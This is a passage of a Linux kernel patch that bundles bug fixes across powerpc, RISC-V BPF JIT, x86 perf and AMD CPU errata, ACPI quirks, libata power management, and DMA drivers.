++++ b/arch/powerpc/include/asm/nohash/64/pgtable.h
+@@ -197,7 +197,7 @@ static inline int __ptep_test_and_clear_young(struct mm_struct *mm,
+ {
+ 	unsigned long old;
+ 
+-	if (pte_young(*ptep))
++	if (!pte_young(*ptep))
+ 		return 0;
+ 	old = pte_update(mm, addr, ptep, _PAGE_ACCESSED, 0, 0);
+ 	return (old & _PAGE_ACCESSED) != 0;
+diff --git a/arch/powerpc/include/asm/nohash/pgtable.h b/arch/powerpc/include/asm/nohash/pgtable.h
+index d9067dfc531cc..3d7dce90863c2 100644
+--- a/arch/powerpc/include/asm/nohash/pgtable.h
++++ b/arch/powerpc/include/asm/nohash/pgtable.h
+@@ -25,7 +25,9 @@ static inline int pte_write(pte_t pte)
+ 	return pte_val(pte) & _PAGE_RW;
+ }
+ #endif
++#ifndef pte_read
+ static inline int pte_read(pte_t pte)		{ return 1; }
++#endif
+ static inline int pte_dirty(pte_t pte)		{ return pte_val(pte) & _PAGE_DIRTY; }
+ static inline int pte_special(pte_t pte)	{ return pte_val(pte) & _PAGE_SPECIAL; }
+ static inline int pte_none(pte_t pte)		{ return (pte_val(pte) & ~_PTE_NONE_MASK) == 0; }
+diff --git a/arch/powerpc/kernel/entry_32.S b/arch/powerpc/kernel/entry_32.S
+index 3fc7c9886bb70..d4fc546762db4 100644
+--- a/arch/powerpc/kernel/entry_32.S
++++ b/arch/powerpc/kernel/entry_32.S
+@@ -135,8 +135,9 @@ ret_from_syscall:
+ 	lis	r4,icache_44x_need_flush@ha
+ 	lwz	r5,icache_44x_need_flush@l(r4)
+ 	cmplwi	cr0,r5,0
+-	bne-	2f
++	bne-	.L44x_icache_flush
+ #endif /* CONFIG_PPC_47x */
++.L44x_icache_flush_return:
+ 	kuep_unlock
+ 	lwz	r4,_LINK(r1)
+ 	lwz	r5,_CCR(r1)
+@@ -170,10 +171,11 @@ syscall_exit_finish:
+ 	b	1b
+ 
+ #ifdef CONFIG_44x
+-2:	li	r7,0
++.L44x_icache_flush:
++	li	r7,0
+ 	iccci	r0,r0
+ 	stw	r7,icache_44x_need_flush@l(r4)
+-	b	1b
++	b	.L44x_icache_flush_return
+ #endif  /* CONFIG_44x */
+ 
+ 	.globl	ret_from_fork
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index f2417ac54edd6..8f5d3c57d58ad 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -236,7 +236,7 @@ static void __build_epilogue(bool is_tail_call, struct rv_jit_context *ctx)
+ 	emit_addi(RV_REG_SP, RV_REG_SP, stack_adjust, ctx);
+ 	/* Set return value. */
+ 	if (!is_tail_call)
+-		emit_mv(RV_REG_A0, RV_REG_A5, ctx);
++		emit_addiw(RV_REG_A0, RV_REG_A5, 0, ctx);
+ 	emit_jalr(RV_REG_ZERO, is_tail_call ? RV_REG_T3 : RV_REG_RA,
+ 		  is_tail_call ? 4 : 0, /* skip TCC init */
+ 		  ctx);
+@@ -428,12 +428,12 @@ static void emit_sext_32_rd(u8 *rd, struct rv_jit_context *ctx)
+ 	*rd = RV_REG_T2;
+ }
+ 
+-static int emit_jump_and_link(u8 rd, s64 rvoff, bool force_jalr,
++static int emit_jump_and_link(u8 rd, s64 rvoff, bool fixed_addr,
+ 			      struct rv_jit_context *ctx)
+ {
+ 	s64 upper, lower;
+ 
+-	if (rvoff && is_21b_int(rvoff) && !force_jalr) {
++	if (rvoff && fixed_addr && is_21b_int(rvoff)) {
+ 		emit(rv_jal(rd, rvoff >> 1), ctx);
+ 		return 0;
+ 	} else if (in_auipc_jalr_range(rvoff)) {
+@@ -454,24 +454,17 @@ static bool is_signed_bpf_cond(u8 cond)
+ 		cond == BPF_JSGE || cond == BPF_JSLE;
+ }
+ 
+-static int emit_call(bool fixed, u64 addr, struct rv_jit_context *ctx)
++static int emit_call(u64 addr, bool fixed_addr, struct rv_jit_context *ctx)
+ {
+ 	s64 off = 0;
+ 	u64 ip;
+-	u8 rd;
+-	int ret;
+ 
+ 	if (addr && ctx->insns) {
+ 		ip = (u64)(long)(ctx->insns + ctx->ninsns);
+ 		off = addr - ip;
+ 	}
+ 
+-	ret = emit_jump_and_link(RV_REG_RA, off, !fixed, ctx);
+-	if (ret)
+-		return ret;
+-	rd = bpf_to_rv_reg(BPF_REG_0, ctx);
+-	emit_mv(rd, RV_REG_A0, ctx);
+-	return 0;
++	return emit_jump_and_link(RV_REG_RA, off, fixed_addr, ctx);
+ }
+ 
+ static void emit_atomic(u8 rd, u8 rs, s16 off, s32 imm, bool is64,
+@@ -913,7 +906,7 @@ out_be:
+ 	/* JUMP off */
+ 	case BPF_JMP | BPF_JA:
+ 		rvoff = rv_offset(i, off, ctx);
+-		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, false, ctx);
++		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, true, ctx);
+ 		if (ret)
+ 			return ret;
+ 		break;
+@@ -1032,17 +1025,21 @@ out_be:
+ 	/* function call */
+ 	case BPF_JMP | BPF_CALL:
+ 	{
+-		bool fixed;
++		bool fixed_addr;
+ 		u64 addr;
+ 
+ 		mark_call(ctx);
+-		ret = bpf_jit_get_func_addr(ctx->prog, insn, extra_pass, &addr,
+-					    &fixed);
++		ret = bpf_jit_get_func_addr(ctx->prog, insn, extra_pass,
++					    &addr, &fixed_addr);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = emit_call(fixed, addr, ctx);
++
++		ret = emit_call(addr, fixed_addr, ctx);
+ 		if (ret)
+ 			return ret;
++
++		if (insn->src_reg != BPF_PSEUDO_CALL)
++			emit_mv(bpf_to_rv_reg(BPF_REG_0, ctx), RV_REG_A0, ctx);
+ 		break;
+ 	}
+ 	/* tail call */
+@@ -1057,7 +1054,7 @@ out_be:
+ 			break;
+ 
+ 		rvoff = epilogue_offset(ctx);
+-		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, false, ctx);
++		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, true, ctx);
+ 		if (ret)
+ 			return ret;
+ 		break;
+diff --git a/arch/x86/events/utils.c b/arch/x86/events/utils.c
+index 76b1f8bb0fd5f..dab4ed199227f 100644
+--- a/arch/x86/events/utils.c
++++ b/arch/x86/events/utils.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <asm/insn.h>
++#include <linux/mm.h>
+ 
+ #include "perf_event.h"
+ 
+@@ -132,9 +133,9 @@ static int get_branch_type(unsigned long from, unsigned long to, int abort,
+ 		 * The LBR logs any address in the IP, even if the IP just
+ 		 * faulted. This means userspace can control the from address.
+ 		 * Ensure we don't blindly read any address by validating it is
+-		 * a known text address.
++		 * a known text address and not a vsyscall address.
+ 		 */
+-		if (kernel_text_address(from)) {
++		if (kernel_text_address(from) && !in_gate_area_no_mm(from)) {
+ 			addr = (void *)from;
+ 			/*
+ 			 * Assume we can get the maximum possible size
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 52d8c67d93081..016fb500b3a6f 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -635,12 +635,17 @@
+ /* AMD Last Branch Record MSRs */
+ #define MSR_AMD64_LBR_SELECT			0xc000010e
+ 
+-/* Fam 17h MSRs */
+-#define MSR_F17H_IRPERF			0xc00000e9
++/* Zen4 */
++#define MSR_ZEN4_BP_CFG			0xc001102e
++#define MSR_ZEN4_BP_CFG_SHARED_BTB_FIX_BIT 5
+ 
++/* Zen 2 */
+ #define MSR_ZEN2_SPECTRAL_CHICKEN	0xc00110e3
+ #define MSR_ZEN2_SPECTRAL_CHICKEN_BIT	BIT_ULL(1)
+ 
++/* Fam 17h MSRs */
++#define MSR_F17H_IRPERF			0xc00000e9
++
+ /* Fam 16h MSRs */
+ #define MSR_F16H_L2I_PERF_CTL		0xc0010230
+ #define MSR_F16H_L2I_PERF_CTR		0xc0010231
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index d1d92897ed6be..46b7ee0ab01a4 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -270,6 +270,17 @@ void __init_or_module noinline apply_alternatives(struct alt_instr *start,
+ 	u8 insn_buff[MAX_PATCH_LEN];
+ 
+ 	DPRINTK("alt table %px, -> %px", start, end);
++
++	/*
++	 * In the case CONFIG_X86_5LEVEL=y, KASAN_SHADOW_START is defined using
++	 * cpu_feature_enabled(X86_FEATURE_LA57) and is therefore patched here.
++	 * During the process, KASAN becomes confused seeing partial LA57
++	 * conversion and triggers a false-positive out-of-bound report.
++	 *
++	 * Disable KASAN until the patching is complete.
++	 */
++	kasan_disable_current();
++
+ 	/*
+ 	 * The scan order should be from start to end. A later scanned
+ 	 * alternative code can overwrite previously scanned alternative code.
+@@ -337,6 +348,8 @@ void __init_or_module noinline apply_alternatives(struct alt_instr *start,
+ next:
+ 		optimize_nops(instr, a->instrlen);
+ 	}
++
++	kasan_enable_current();
+ }
+ 
+ static inline bool is_jcc32(struct insn *insn)
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index f240c978d85e4..b66960358381b 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -80,6 +80,10 @@ static const int amd_div0[] =
+ 	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x00, 0x0, 0x2f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0x50, 0x0, 0x5f, 0xf));
+ 
++static const int amd_erratum_1485[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x19, 0x10, 0x0, 0x1f, 0xf),
++			   AMD_MODEL_RANGE(0x19, 0x60, 0x0, 0xaf, 0xf));
++
+ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+ {
+ 	int osvw_id = *erratum++;
+@@ -1125,6 +1129,10 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 		pr_notice_once("AMD Zen1 DIV0 bug detected. Disable SMT for full protection.\n");
+ 		setup_force_cpu_bug(X86_BUG_DIV0);
+ 	}
++
++	if (!cpu_has(c, X86_FEATURE_HYPERVISOR) &&
++	     cpu_has_amd_erratum(c, amd_erratum_1485))
++		msr_set_bit(MSR_ZEN4_BP_CFG, MSR_ZEN4_BP_CFG_SHARED_BTB_FIX_BIT);
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index ee4c812c8f6cc..8bb233d2d1e48 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1886,6 +1886,17 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP 15-cx0041ur"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP Pavilion Gaming Laptop 15-dk1xxx
++		 * https://github.com/systemd/systemd/issues/28942
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-dk1xxx"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a7f12bdbc5e25..af6fa801d1ed8 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -439,6 +439,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B1402CBA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B1402CBA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2402CBA",
+ 		.matches = {
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 6a053cd0cf410..fbc231a3f7951 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -1943,6 +1943,96 @@ retry:
+ 	return rc;
+ }
+ 
++/**
++ *	ata_dev_power_set_standby - Set a device power mode to standby
++ *	@dev: target device
++ *
++ *	Issue a STANDBY IMMEDIATE command to set a device power mode to standby.
++ *	For an HDD device, this spins down the disks.
++ *
++ *	LOCKING:
++ *	Kernel thread context (may sleep).
++ */
++void ata_dev_power_set_standby(struct ata_device *dev)
++{
++	unsigned long ap_flags = dev->link->ap->flags;
++	struct ata_taskfile tf;
++	unsigned int err_mask;
++
++	/* Issue STANDBY IMMEDIATE command only if supported by the device */
++	if (dev->class != ATA_DEV_ATA && dev->class != ATA_DEV_ZAC)
++		return;
++
++	/*
++	 * Some odd clown BIOSes issue spindown on power off (ACPI S4 or S5)
++	 * causing some drives to spin up and down again. For these, do nothing
++	 * if we are being called on shutdown.
++	 */
++	if ((ap_flags & ATA_FLAG_NO_POWEROFF_SPINDOWN) &&
++	    system_state == SYSTEM_POWER_OFF)
++		return;
++
++	if ((ap_flags & ATA_FLAG_NO_HIBERNATE_SPINDOWN) &&
++	    system_entering_hibernation())
++		return;
++
++	ata_tf_init(dev, &tf);
++	tf.flags |= ATA_TFLAG_DEVICE | ATA_TFLAG_ISADDR;
++	tf.protocol = ATA_PROT_NODATA;
++	tf.command = ATA_CMD_STANDBYNOW1;
++
++	ata_dev_notice(dev, "Entering standby power mode\n");
++
++	err_mask = ata_exec_internal(dev, &tf, NULL, DMA_NONE, NULL, 0, 0);
++	if (err_mask)
++		ata_dev_err(dev, "STANDBY IMMEDIATE failed (err_mask=0x%x)\n",
++			    err_mask);
++}
++
++/**
++ *	ata_dev_power_set_active -  Set a device power mode to active
++ *	@dev: target device
++ *
++ *	Issue a VERIFY command to enter to ensure that the device is in the
++ *	active power mode. For a spun-down HDD (standby or idle power mode),
++ *	the VERIFY command will complete after the disk spins up.
++ *
++ *	LOCKING:
++ *	Kernel thread context (may sleep).
++ */
++void ata_dev_power_set_active(struct ata_device *dev)
++{
++	struct ata_taskfile tf;
++	unsigned int err_mask;
++
++	/*
++	 * Issue READ VERIFY SECTORS command for 1 sector at lba=0 only
++	 * if supported by the device.
++	 */
++	if (dev->class != ATA_DEV_ATA && dev->class != ATA_DEV_ZAC)
++		return;
++
++	ata_tf_init(dev, &tf);
++	tf.flags |= ATA_TFLAG_DEVICE | ATA_TFLAG_ISADDR;
++	tf.protocol = ATA_PROT_NODATA;
++	tf.command = ATA_CMD_VERIFY;
++	tf.nsect = 1;
++	if (dev->flags & ATA_DFLAG_LBA) {
++		tf.flags |= ATA_TFLAG_LBA;
++		tf.device |= ATA_LBA;
++	} else {
++		/* CHS */
++		tf.lbal = 0x1; /* sect */
++	}
++
++	ata_dev_notice(dev, "Entering active power mode\n");
++
++	err_mask = ata_exec_internal(dev, &tf, NULL, DMA_NONE, NULL, 0, 0);
++	if (err_mask)
++		ata_dev_err(dev, "VERIFY failed (err_mask=0x%x)\n",
++			    err_mask);
++}
++
+ /**
+  *	ata_read_log_page - read a specific log page
+  *	@dev: target device
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 6d4c80b6daaef..2a04dd36a4948 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -106,6 +106,14 @@ static const unsigned int ata_eh_flush_timeouts[] = {
+ 	UINT_MAX,
+ };
+ 
++static const unsigned int ata_eh_pm_timeouts[] = {
++	10000,	/* most drives spin up by 10sec */
++	10000,	/* > 99% working drives spin up before 20sec */
++	35000,	/* give > 30 secs of idleness for outlier devices */
++	 5000,	/* and sweet one last chance */
++	UINT_MAX, /* > 1 min has elapsed, give up */
++};
++
+ static const unsigned int ata_eh_other_timeouts[] = {
+ 	 5000,	/* same rationale as identify timeout */
+ 	10000,	/* ditto */
+@@ -147,6 +155,8 @@ ata_eh_cmd_timeout_table[ATA_EH_CMD_TIMEOUT_TABLE_SIZE] = {
+ 	  .timeouts = ata_eh_other_timeouts, },
+ 	{ .commands = CMDS(ATA_CMD_FLUSH, ATA_CMD_FLUSH_EXT),
+ 	  .timeouts = ata_eh_flush_timeouts },
++	{ .commands = CMDS(ATA_CMD_VERIFY),
++	  .timeouts = ata_eh_pm_timeouts },
+ };
+ #undef CMDS
+ 
+@@ -498,7 +508,19 @@ static void ata_eh_unload(struct ata_port *ap)
+ 	struct ata_device *dev;
+ 	unsigned long flags;
+ 
+-	/* Restore SControl IPM and SPD for the next driver and
++	/*
++	 * Unless we are restarting, transition all enabled devices to
++	 * standby power mode.
++	 */
++	if (system_state != SYSTEM_RESTART) {
++		ata_for_each_link(link, ap, PMP_FIRST) {
++			ata_for_each_dev(dev, link, ENABLED)
++				ata_dev_power_set_standby(dev);
++		}
++	}
++
++	/*
++	 * Restore SControl IPM and SPD for the next driver and
+ 	 * disable attached devices.
+ 	 */
+ 	ata_for_each_link(link, ap, PMP_FIRST) {
+@@ -687,6 +709,10 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 				ehc->saved_xfer_mode[devno] = dev->xfer_mode;
+ 				if (ata_ncq_enabled(dev))
+ 					ehc->saved_ncq_enabled |= 1 << devno;
++
++				/* If we are resuming, wake up the device */
++				if (ap->pflags & ATA_PFLAG_RESUMING)
++					ehc->i.dev_action[devno] |= ATA_EH_SET_ACTIVE;
+ 			}
+ 		}
+ 
+@@ -750,6 +776,8 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 	/* clean up */
+ 	spin_lock_irqsave(ap->lock, flags);
+ 
++	ap->pflags &= ~ATA_PFLAG_RESUMING;
++
+ 	if (ap->pflags & ATA_PFLAG_LOADING)
+ 		ap->pflags &= ~ATA_PFLAG_LOADING;
+ 	else if ((ap->pflags & ATA_PFLAG_SCSI_HOTPLUG) &&
+@@ -1241,6 +1269,13 @@ void ata_eh_detach_dev(struct ata_device *dev)
+ 	struct ata_eh_context *ehc = &link->eh_context;
+ 	unsigned long flags;
+ 
++	/*
++	 * If the device is still enabled, transition it to standby power mode
++	 * (i.e. spin down HDDs).
++	 */
++	if (ata_dev_enabled(dev))
++		ata_dev_power_set_standby(dev);
++
+ 	ata_dev_disable(dev);
+ 
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -2927,6 +2962,15 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 		if (ehc->i.flags & ATA_EHI_DID_RESET)
+ 			readid_flags |= ATA_READID_POSTRESET;
+ 
++		/*
++		 * When resuming, before executing any command, make sure to
++		 * transition the device to the active power mode.
++		 */
++		if ((action & ATA_EH_SET_ACTIVE) && ata_dev_enabled(dev)) {
++			ata_dev_power_set_active(dev);
++			ata_eh_done(link, dev, ATA_EH_SET_ACTIVE);
++		}
++
+ 		if ((action & ATA_EH_REVALIDATE) && ata_dev_enabled(dev)) {
+ 			WARN_ON(dev->class == ATA_DEV_PMP);
+ 
+@@ -3886,6 +3930,7 @@ static void ata_eh_handle_port_suspend(struct ata_port *ap)
+ 	unsigned long flags;
+ 	int rc = 0;
+ 	struct ata_device *dev;
++	struct ata_link *link;
+ 
+ 	/* are we suspending? */
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -3898,6 +3943,12 @@ static void ata_eh_handle_port_suspend(struct ata_port *ap)
+ 
+ 	WARN_ON(ap->pflags & ATA_PFLAG_SUSPENDED);
+ 
++	/* Set all devices attached to the port in standby mode */
++	ata_for_each_link(link, ap, HOST_FIRST) {
++		ata_for_each_dev(dev, link, ENABLED)
++			ata_dev_power_set_standby(dev);
++	}
++
+ 	/*
+ 	 * If we have a ZPODD attached, check its zero
+ 	 * power ready status before the port is frozen.
+@@ -3980,6 +4031,7 @@ static void ata_eh_handle_port_resume(struct ata_port *ap)
+ 	/* update the flags */
+ 	spin_lock_irqsave(ap->lock, flags);
+ 	ap->pflags &= ~(ATA_PFLAG_PM_PENDING | ATA_PFLAG_SUSPENDED);
++	ap->pflags |= ATA_PFLAG_RESUMING;
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ }
+ #endif /* CONFIG_PM */
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 7b9c9264b9a72..2b9676416b8e8 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1081,15 +1081,13 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		}
+ 	} else {
+ 		sdev->sector_size = ata_id_logical_sector_size(dev->id);
++
+ 		/*
+-		 * Stop the drive on suspend but do not issue START STOP UNIT
+-		 * on resume as this is not necessary and may fail: the device
+-		 * will be woken up by ata_port_pm_resume() with a port reset
+-		 * and device revalidation.
++		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
++		 * and resume only. For system level suspend/resume, devices
++		 * power state is handled directly by libata EH.
+ 		 */
+-		sdev->manage_system_start_stop = true;
+ 		sdev->manage_runtime_start_stop = true;
+-		sdev->no_start_on_resume = 1;
+ 	}
+ 
+ 	/*
+@@ -1265,7 +1263,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 	}
+ 
+ 	if (cdb[4] & 0x1) {
+-		tf->nsect = 1;	/* 1 sector, lba=0 */
++		tf->nsect = 1;  /* 1 sector, lba=0 */
+ 
+ 		if (qc->dev->flags & ATA_DFLAG_LBA) {
+ 			tf->flags |= ATA_TFLAG_LBA;
+@@ -1281,7 +1279,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 			tf->lbah = 0x0; /* cyl high */
+ 		}
+ 
+-		tf->command = ATA_CMD_VERIFY;	/* READ VERIFY */
++		tf->command = ATA_CMD_VERIFY;   /* READ VERIFY */
+ 	} else {
+ 		/* Some odd clown BIOSen issue spindown on power off (ACPI S4
+ 		 * or S5) causing some drives to spin up and down again.
+@@ -1291,7 +1289,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 			goto skip;
+ 
+ 		if ((qc->ap->flags & ATA_FLAG_NO_HIBERNATE_SPINDOWN) &&
+-		     system_entering_hibernation())
++		    system_entering_hibernation())
+ 			goto skip;
+ 
+ 		/* Issue ATA STANDBY IMMEDIATE command */
+diff --git a/drivers/ata/libata.h b/drivers/ata/libata.h
+index e5ec197aed303..a5e0e676ed9a8 100644
+--- a/drivers/ata/libata.h
++++ b/drivers/ata/libata.h
+@@ -62,6 +62,8 @@ extern int ata_dev_reread_id(struct ata_device *dev, unsigned int readid_flags);
+ extern int ata_dev_revalidate(struct ata_device *dev, unsigned int new_class,
+ 			      unsigned int readid_flags);
+ extern int ata_dev_configure(struct ata_device *dev);
++extern void ata_dev_power_set_standby(struct ata_device *dev);
++extern void ata_dev_power_set_active(struct ata_device *dev);
+ extern int sata_down_spd_limit(struct ata_link *link, u32 spd_limit);
+ extern int ata_down_xfermask_limit(struct ata_device *dev, unsigned int sel);
+ extern unsigned int ata_dev_set_feature(struct ata_device *dev,
+diff --git a/drivers/counter/counter-chrdev.c b/drivers/counter/counter-chrdev.c
+index 80acdf62794a3..afc94d0062b17 100644
+--- a/drivers/counter/counter-chrdev.c
++++ b/drivers/counter/counter-chrdev.c
+@@ -247,8 +247,8 @@ static int counter_get_ext(const struct counter_comp *const ext,
+ 		if (*id == component_id)
+ 			return 0;
+ 
+-		if (ext->type == COUNTER_COMP_ARRAY) {
+-			element = ext->priv;
++		if (ext[*ext_idx].type == COUNTER_COMP_ARRAY) {
++			element = ext[*ext_idx].priv;
+ 
+ 			if (component_id - *id < element->length)
+ 				return 0;
+diff --git a/drivers/counter/microchip-tcb-capture.c b/drivers/counter/microchip-tcb-capture.c
+index e2d1dc6ca6682..c7af13aca36cf 100644
+--- a/drivers/counter/microchip-tcb-capture.c
++++ b/drivers/counter/microchip-tcb-capture.c
+@@ -98,7 +98,7 @@ static int mchp_tc_count_function_write(struct counter_device *counter,
+ 		priv->qdec_mode = 0;
+ 		/* Set highest rate based on whether soc has gclk or not */
+ 		bmr &= ~(ATMEL_TC_QDEN | ATMEL_TC_POSEN);
+-		if (priv->tc_cfg->has_gclk)
++		if (!priv->tc_cfg->has_gclk)
+ 			cmr |= ATMEL_TC_TIMER_CLOCK2;
+ 		else
+ 			cmr |= ATMEL_TC_TIMER_CLOCK1;
+diff --git a/drivers/dma-buf/dma-fence-unwrap.c b/drivers/dma-buf/dma-fence-unwrap.c
+index c625bb2b5d563..628af51c81af3 100644
+--- a/drivers/dma-buf/dma-fence-unwrap.c
++++ b/drivers/dma-buf/dma-fence-unwrap.c
+@@ -76,16 +76,11 @@ struct dma_fence *__dma_fence_unwrap_merge(unsigned int num_fences,
+ 		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i]) {
+ 			if (!dma_fence_is_signaled(tmp)) {
+ 				++count;
+-			} else if (test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT,
+-					    &tmp->flags)) {
+-				if (ktime_after(tmp->timestamp, timestamp))
+-					timestamp = tmp->timestamp;
+ 			} else {
+-				/*
+-				 * Use the current time if the fence is
+-				 * currently signaling.
+-				 */
+-				timestamp = ktime_get();
++				ktime_t t = dma_fence_timestamp(tmp);
++
++				if (ktime_after(t, timestamp))
++					timestamp = t;
+ 			}
+ 		}
+ 	}
+diff --git a/drivers/dma-buf/sync_file.c b/drivers/dma-buf/sync_file.c
+index af57799c86cee..2e9a316c596a3 100644
+--- a/drivers/dma-buf/sync_file.c
++++ b/drivers/dma-buf/sync_file.c
+@@ -268,13 +268,10 @@ static int sync_fill_fence_info(struct dma_fence *fence,
+ 		sizeof(info->driver_name));
+ 
+ 	info->status = dma_fence_get_status(fence);
+-	while (test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags) &&
+-	       !test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags))
+-		cpu_relax();
+ 	info->timestamp_ns =
+-		test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags) ?
+-		ktime_to_ns(fence->timestamp) :
+-		ktime_set(0, 0);
++		dma_fence_is_signaled(fence) ?
++			ktime_to_ns(dma_fence_timestamp(fence)) :
++			ktime_set(0, 0);
+ 
+ 	return info->status;
+ }
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 3b4ad7739f9ee..188f6b8625f78 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -495,6 +495,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	union idxd_command_reg cmd;
+ 	DECLARE_COMPLETION_ONSTACK(done);
+ 	u32 stat;
++	unsigned long flags;
+ 
+ 	if (idxd_device_is_halted(idxd)) {
+ 		dev_warn(&idxd->pdev->dev, "Device is HALTED!\n");
+@@ -508,7 +509,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	cmd.operand = operand;
+ 	cmd.int_req = 1;
+ 
+-	spin_lock(&idxd->cmd_lock);
++	spin_lock_irqsave(&idxd->cmd_lock, flags);
+ 	wait_event_lock_irq(idxd->cmd_waitq,
+ 			    !test_bit(IDXD_FLAG_CMD_RUNNING, &idxd->flags),
+ 			    idxd->cmd_lock);
+@@ -525,7 +526,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	 * After command submitted, release lock and go to sleep until
+ 	 * the command completes via interrupt.
+ 	 */
+-	spin_unlock(&idxd->cmd_lock);
++	spin_unlock_irqrestore(&idxd->cmd_lock, flags);
+ 	wait_for_completion(&done);
+ 	stat = ioread32(idxd->reg_base + IDXD_CMDSTS_OFFSET);
+ 	spin_lock(&idxd->cmd_lock);
+diff --git a/drivers/dma/mediatek/mtk-uart-apdma.c b/drivers/dma/mediatek/mtk-uart-apdma.c
+index a1517ef1f4a01..0acf6a92a4ad3 100644
+--- a/drivers/dma/mediatek/mtk-uart-apdma.c
++++ b/drivers/dma/mediatek/mtk-uart-apdma.c
+@@ -451,9 +451,8 @@ static int mtk_uart_apdma_device_pause(struct dma_chan *chan)
+ 	mtk_uart_apdma_write(c, VFF_EN, VFF_EN_CLR_B);
+ 	mtk_uart_apdma_write(c, VFF_INT_EN, VFF_INT_EN_CLR_B);
+ 
+-	synchronize_irq(c->irq);
+-
+ 	spin_unlock_irqrestore(&c->vc.lock, flags);
++	synchronize_irq(c->irq);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/dma/stm32-dma.c b/drivers/dma/stm32-dma.c
+index 37674029cb427..592d48ecf241f 100644
+--- a/drivers/dma/stm32-dma.c
++++ b/drivers/dma/stm32-dma.c
+@@ -1113,8 +1113,10 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_slave_sg(
+ 		chan->chan_reg.dma_scr &= ~STM32_DMA_SCR_PFCTRL;
+ 
+ 	/* Activate Double Buffer Mode if DMA triggers STM32 MDMA and more than 1 sg */
+-	if (chan->trig_mdma && sg_len > 1)
++	if (chan->trig_mdma && sg_len > 1) {
+ 		chan->chan_reg.dma_scr |= STM32_DMA_SCR_DBM;
++		chan->chan_reg.dma_scr &= ~STM32_DMA_SCR_CT;
++	}
+ 
+ 	for_each_sg(sgl, sg, sg_len, i) {
+ 		ret = stm32_dma_set_xfer_param(chan, direction, &buswidth,
+@@ -1387,11 +1389,12 @@ static size_t stm32_dma_desc_residue(struct stm32_dma_chan *chan,
+ 
